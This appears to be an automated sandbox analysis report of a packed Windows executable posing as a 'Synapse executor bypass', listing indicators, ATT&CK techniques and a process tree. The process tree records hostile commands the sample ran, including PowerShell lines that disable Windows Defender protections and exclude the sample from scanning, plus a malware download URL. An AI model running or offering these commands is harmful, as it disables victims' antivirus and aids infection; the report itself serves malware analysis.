hxxps://cdn[.]discordapp[.]com/attachments/1111744506375721070/1111746136181588018/synapse_executor_bypassed[.]exe

Analysis

max time kernel
1799s
max time network
1689s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2023, 20:16

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1111744506375721070/1111746136181588018/synapse_executor_bypassed.exe

Score

8^/10

pyinstaller upx

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1696	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe

Loads dropped DLL 18 IoCs

pid	Process
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe
2748	synapse_executor_bypassed.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0002000000022cf0-226.dat	upx
behavioral1/files/0x0002000000022cf0-227.dat	upx
behavioral1/files/0x0002000000022cf3-231.dat	upx
behavioral1/files/0x0002000000022cf3-232.dat	upx
behavioral1/files/0x000200000001f748-233.dat	upx
behavioral1/files/0x0005000000022722-235.dat	upx
behavioral1/files/0x0005000000022722-236.dat	upx
behavioral1/files/0x000200000001f748-234.dat	upx
behavioral1/files/0x000400000001fca6-238.dat	upx
behavioral1/files/0x000400000001fca6-237.dat	upx
behavioral1/files/0x000200000001f747-239.dat	upx
behavioral1/memory/2748-240-0x00007FFB8E040000-0x00007FFB8E629000-memory.dmp	upx
behavioral1/files/0x0002000000021ac1-242.dat	upx
behavioral1/files/0x0002000000021ac1-244.dat	upx
behavioral1/files/0x0002000000022cf2-246.dat	upx
behavioral1/memory/2748-247-0x00007FFB9B6B0000-0x00007FFB9B6BF000-memory.dmp	upx
behavioral1/files/0x0002000000022cf2-245.dat	upx
behavioral1/memory/2748-243-0x00007FFB8E010000-0x00007FFB8E033000-memory.dmp	upx
behavioral1/files/0x0002000000021ac0-249.dat	upx
behavioral1/memory/2748-252-0x00007FFB8DFE0000-0x00007FFB8E00D000-memory.dmp	upx
behavioral1/memory/2748-258-0x00007FFB8DE40000-0x00007FFB8DFB0000-memory.dmp	upx
behavioral1/files/0x0002000000022b43-260.dat	upx
behavioral1/files/0x00020000000225e5-256.dat	upx
behavioral1/files/0x00020000000225e5-262.dat	upx
behavioral1/files/0x00020000000225e5-261.dat	upx
behavioral1/memory/2748-259-0x00007FFB98730000-0x00007FFB9873D000-memory.dmp	upx
behavioral1/files/0x000700000001fc9f-264.dat	upx
behavioral1/files/0x000b0000000215ce-266.dat	upx
behavioral1/files/0x000b0000000215ce-265.dat	upx
behavioral1/files/0x000200000001f723-267.dat	upx
behavioral1/files/0x000200000001f723-268.dat	upx
behavioral1/files/0x000700000001fc9f-263.dat	upx
behavioral1/files/0x0002000000022b43-257.dat	upx
behavioral1/files/0x00020000000225be-255.dat	upx
behavioral1/memory/2748-269-0x00007FFBA0DD0000-0x00007FFBA0DE0000-memory.dmp	upx
behavioral1/memory/2748-270-0x00007FFB8DFB0000-0x00007FFB8DFD3000-memory.dmp	upx
behavioral1/memory/2748-271-0x00007FFB983C0000-0x00007FFB983D9000-memory.dmp	upx
behavioral1/memory/2748-272-0x00007FFB8DE10000-0x00007FFB8DE3E000-memory.dmp	upx
behavioral1/memory/2748-274-0x00007FFB8D9D0000-0x00007FFB8DD49000-memory.dmp	upx
behavioral1/memory/2748-273-0x00007FFB8DD50000-0x00007FFB8DE08000-memory.dmp	upx
behavioral1/memory/2748-276-0x00007FFB91C80000-0x00007FFB91C94000-memory.dmp	upx
behavioral1/memory/2748-280-0x00007FFB8D770000-0x00007FFB8D9C2000-memory.dmp	upx
behavioral1/memory/2748-278-0x00007FFB92640000-0x00007FFB9264D000-memory.dmp	upx
behavioral1/files/0x0002000000022cf1-251.dat	upx
behavioral1/files/0x0002000000022cf1-250.dat	upx
behavioral1/memory/2748-254-0x00007FFB98E20000-0x00007FFB98E39000-memory.dmp	upx
behavioral1/files/0x00020000000225be-253.dat	upx
behavioral1/files/0x0002000000021ac0-248.dat	upx
behavioral1/files/0x000200000001f747-241.dat	upx
behavioral1/memory/2748-290-0x00007FFB8E040000-0x00007FFB8E629000-memory.dmp	upx
behavioral1/memory/2748-293-0x00007FFBA0DD0000-0x00007FFBA0DE0000-memory.dmp	upx
behavioral1/memory/2748-294-0x00007FFB8E010000-0x00007FFB8E033000-memory.dmp	upx
behavioral1/memory/2748-296-0x00007FFB9B6B0000-0x00007FFB9B6BF000-memory.dmp	upx
behavioral1/memory/2748-298-0x00007FFB8DFE0000-0x00007FFB8E00D000-memory.dmp	upx
behavioral1/memory/2748-299-0x00007FFB98E20000-0x00007FFB98E39000-memory.dmp	upx
behavioral1/memory/2748-300-0x00007FFB8DFB0000-0x00007FFB8DFD3000-memory.dmp	upx
behavioral1/memory/2748-301-0x00007FFB8DE40000-0x00007FFB8DFB0000-memory.dmp	upx
behavioral1/memory/2748-302-0x00007FFB983C0000-0x00007FFB983D9000-memory.dmp	upx
behavioral1/memory/2748-303-0x00007FFB98730000-0x00007FFB9873D000-memory.dmp	upx
behavioral1/memory/2748-310-0x00007FFB8DE10000-0x00007FFB8DE3E000-memory.dmp	upx
behavioral1/memory/2748-311-0x00007FFB8DD50000-0x00007FFB8DE08000-memory.dmp	upx
behavioral1/memory/2748-312-0x00007FFB8D9D0000-0x00007FFB8DD49000-memory.dmp	upx
behavioral1/memory/2748-313-0x00007FFB91C80000-0x00007FFB91C94000-memory.dmp	upx
behavioral1/memory/2748-314-0x00007FFB92640000-0x00007FFB9264D000-memory.dmp	upx

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000500000001db36-152.dat	pyinstaller
behavioral1/files/0x000500000001db36-199.dat	pyinstaller
behavioral1/files/0x000500000001db36-200.dat	pyinstaller
behavioral1/files/0x000500000001db36-225.dat	pyinstaller

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3324	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133296129950370231"	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1780	chrome.exe
1780	chrome.exe
4044	powershell.exe
4044	powershell.exe
4044	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3620	chrome.exe
3620	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1780	chrome.exe
1780	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeShutdownPrivilege	1780	chrome.exe
Token: SeCreatePagefilePrivilege	1780	chrome.exe
Token: SeIncreaseQuotaPrivilege	4756	WMIC.exe
Token: SeSecurityPrivilege	4756	WMIC.exe
Token: SeTakeOwnershipPrivilege	4756	WMIC.exe
Token: SeLoadDriverPrivilege	4756	WMIC.exe
Token: SeSystemProfilePrivilege	4756	WMIC.exe
Token: SeSystemtimePrivilege	4756	WMIC.exe
Token: SeProfSingleProcessPrivilege	4756	WMIC.exe
Token: SeIncBasePriorityPrivilege	4756	WMIC.exe
Token: SeCreatePagefilePrivilege	4756	WMIC.exe
Token: SeBackupPrivilege	4756	WMIC.exe
Token: SeRestorePrivilege	4756	WMIC.exe
Token: SeShutdownPrivilege	4756	WMIC.exe
Token: SeDebugPrivilege	4756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4756	WMIC.exe
Token: SeRemoteShutdownPrivilege	4756	WMIC.exe
Token: SeUndockPrivilege	4756	WMIC.exe
Token: SeManageVolumePrivilege	4756	WMIC.exe
Token: 33	4756	WMIC.exe
Token: 34	4756	WMIC.exe
Token: 35	4756	WMIC.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe
1780	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1780 wrote to memory of 3552	1780	chrome.exe	84
PID 1780 wrote to memory of 3552	1780	chrome.exe	84
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 4672	1780	chrome.exe	85
PID 1780 wrote to memory of 3132	1780	chrome.exe	86
PID 1780 wrote to memory of 3132	1780	chrome.exe	86
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87
PID 1780 wrote to memory of 116	1780	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1111744506375721070/1111746136181588018/synapse_executor_bypassed.exe
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb91c59758,0x7ffb91c59768,0x7ffb91c59778
  2⤵
  PID:3552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:2
  2⤵
  PID:4672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:1
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5368 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:4292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5064 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5020 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:4952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:1440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5368 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5164 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:4944
- C:\Users\Admin\Downloads\synapse_executor_bypassed.exe
  "C:\Users\Admin\Downloads\synapse_executor_bypassed.exe"
  2⤵
  - Executes dropped EXE
  PID:1696
- - C:\Users\Admin\Downloads\synapse_executor_bypassed.exe
    "C:\Users\Admin\Downloads\synapse_executor_bypassed.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net session"
      4⤵
      PID:5092
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:3284
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:2764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4896
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3404
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error404', 0, 'error', 0+16);close()""
      4⤵
      PID:4240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:3096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\synapse_executor_bypassed.exe'"
      4⤵
      PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:8
  2⤵
  PID:4076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3660 --field-trial-handle=1828,i,8503433271784072779,5522002789883256149,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3620

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\synapse_executor_bypassed.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4044

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error404', 0, 'error', 0+16);close()"
1⤵
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
7487e174b192d32f5620a8970a15050a

SHA1
f3e06b3b7806a38d75508d4780572a748c77f8ad

SHA256
08c446130970848626fa748599f1b048f8d4ce654b2958bab1679887528fb0c5

SHA512
893749431a4976ddc5df143fa821a9d11262a34f9fbb6f93cadfbc8d27b247a526e69b8fd3f0cff3338c89f81e1af7122b019b98257a9a17e1f3b3c4cfaf2367

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
649c336b7e329a9602cc8655d68493f6

SHA1
b9e0e5f9662e3c55d7b068261478ada3a82780e6

SHA256
880e48013fe4c4a26df2a140d7741a68493d1bf9daa25f56e60b94f304269cf9

SHA512
5bfbeaa751589dcd602e1e7803a85a1e28dd4986ed33839bfc70bc4f4a855bd40c2fe8493efab3447e2fb4abc47ef8262cdbbf48e6c4985a20732c50172ca7e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
287253676a24f7dea7e964d46dae31a2

SHA1
ef72b4b4fd511319b49ed71c687291334992c639

SHA256
22ee54e411306adc1019cae12c84240cdbe8f45a3bcedf119cfb317816c78095

SHA512
ec8a7f18e7587ea874e33d5326d14e610de69d198dd74b885dd4d76b6236bf9e46b9b0e4b92fcbeffa83438f6ee36b8589a0eae246b3958eff5917f40b3b6f29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
4f1fa51f3c19dcc49d1aa05cafd818ab

SHA1
98580655174b527c0ed909236482fa9f5830c0f2

SHA256
938ffa051c9a1525f21247bb8356fa7d73a56ee8efc17d90ca073dc320357f31

SHA512
c90102cf2f27f2e1492f479491855c04807a463a2c91a7411540f4e980cb0faeadc9ac024b342be0bbb58bafb6e866aa80e09c389863d1e6fa9fac86cae6381a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
154KB

MD5
988b870c957b89c58905dbe73d9a339f

SHA1
6760666e5574ba958115baa5c783b50d2485145e

SHA256
ecb25c880944c68b18c1d6fc95e146f047c4be6f7ff638f38e5ca75297dcfb9a

SHA512
22448b982553431c71c4d110c8d9435374071fe0aa3afc445b8b9fd8987ebe6a795991a51e690fb9e45f00ec67e8aa37f108290487e0d88c10f7f0cf24c3391c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
cd1019f3446886a2da3bac0831a1ec62

SHA1
